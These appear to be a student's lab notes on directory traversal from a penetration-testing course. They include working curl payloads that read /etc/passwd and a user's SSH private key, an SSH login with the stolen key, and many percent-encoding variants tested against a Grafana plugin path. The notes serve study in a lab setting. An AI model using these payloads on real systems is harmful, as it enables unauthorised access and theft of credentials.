# 9. Common Web Application Attacks
no notes

## 9.1. Directory Traversal

### 9.1.1. Absolute vs Relative Paths
Directory Traversal can be done using either Absolute OR Relative paths depending on the vulnerability

### 9.1.2. Identifying and Exploiting Directory Traversals

Linux webroot is often times /var/www/html/

PHP uses $_GET2 to manage variables via a GET request

Directory traversal vulnerabilities are mostly used for gathering information. As mentioned before, if we can access certain files containing sensitive information, like passwords or keys, it may lead to system access.

SSH keys are usually located in the home directory of a user in the .ssh folder -- example of directory traversal to get SSH keys
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

Avoid using browser to read information. use burp or curl, like so
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

Save SSH key into filecalled dt_key, adjust permissions (failing to change permissions will cause unprotected keyfile error)
chmod 400 dt_key
ssh -i dt_key -p 2222 offsec@mountaindesserts.com

Windows /etc/hosts is C:\Windows\System32\drivers\etc\hosts (we use this file because its readable by all local users)

Linux systems, a standard vector for directory traversal is to list the users of the system by displaying the contents of /etc/passwd, check for private keys in their home directory, and use them to access the system via SSH
In Windows there is really no way to do this...

Windows IIS webserver logs are at C:\inetpub\logs\LogFiles\W3SVC1\

For windows targets try both forward and backslashes...

Lab Notes
If you do not chmod the ssh key not only will it fail, but it will also ask for password

### 9.1.3. Encoding Special Characters

curl http://192.168.50.16/cgi-bin/../../../../etc/passwd

url encode (aka percent encode) curl for ../ traversal attack
curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
NOTE: 2e hexidecimal is 46. 46 in ascii is a DOT or period ".". no need to encode slashes as those are naturally part of URLS

Lab notes: Q1 had us look for the flag in /opt/passwords... is the /opt folder supposed to be something we check? Is there a way that we can automate directory traversal to locate low hanging fruit?
This reddit has a couple of good answers on some files to check.. one mentioned loading Seclists/fuzzing/LFI into burp intruder as a way to automate -- https://www.reddit.com/r/oscp/comments/1ae050m/path_traversal/

WORKING PAYLOAD -- NOTE: REPLACING curl from any payloads that failed with the word FAILED so that they do not populate in a search!
curl --path-as-is http://192.168.162.16:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

CASE: only encoding the dots in between /'s -- passed
curl --path-as-is http://192.168.162.16:3000/public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Something else I noticed is that non-encoded payloads need the --path-as-is argument. Encoded payloads work the same with or without the argument

CASE: Everything is encoded -- failed
failed %68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%36%32%2e%31%36%3a%33%30%30%30%2f%70%75%62%6c%69%63%2f%70%6c%75%67%69%6e%73%2f%61%6c%65%72%74%6c%69%73%74%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

CASE: everything between alertlist/ and /etc/passwd is encoded -- pass
curl http://192.168.162.16:3000/public/plugins/alertlist/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd

CASE: Slash after alertlist is encoded -- fail
failed http://192.168.162.16:3000/public/plugins/alertlist%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd

CASE: slash in /etc/passwords are replaced -- pass
curl http://192.168.162.16:3000/public/plugins/alertlist/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2Fpasswd

CASE: encoding the word public in the uri -- pass
curl http://192.168.162.16:3000/%70%75%62%6c%69%63/plugins/alertlist/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2Fpasswd

CASE: Encoding the slashes in front and behind plugins -- fail
failed http://192.168.162.16:3000/%70%75%62%6c%69%63%2fplugins%2falertlist/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2Fpasswd

Conclusion: I have to be careful which slashes I encode.... I can encode any slashes after the first one in alertslist/ and I can encode any word in between slashes after the hostname:port. 
However encoding slashes in the regular url will break the request.... Is this observation specific to Grafana or with any directory traversal?


<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>><><
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>><><
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>><><
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>><><
Extra Reading   
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>><><
9.1.3. Encoding Special Characters
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
https://en.wikipedia.org/wiki/Web_application_firewall
https://en.wikipedia.org/wiki/Percent-encoding
https://www.w3schools.com/tags/ref_urlencode.asp


9.1.2. Identifying and Exploiting Directory Traversals
https://en.wikipedia.org/wiki/Directory_traversal_attack
https://www.php.net/manual/en/reserved.variables.get.php
https://portswigger.net/burp
https://curl.se/
https://en.wikipedia.org/wiki/Internet_Information_Services
https://docs.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/managing-iis-log-file-storage
https://www.ietf.org/rfc/rfc1738.txt
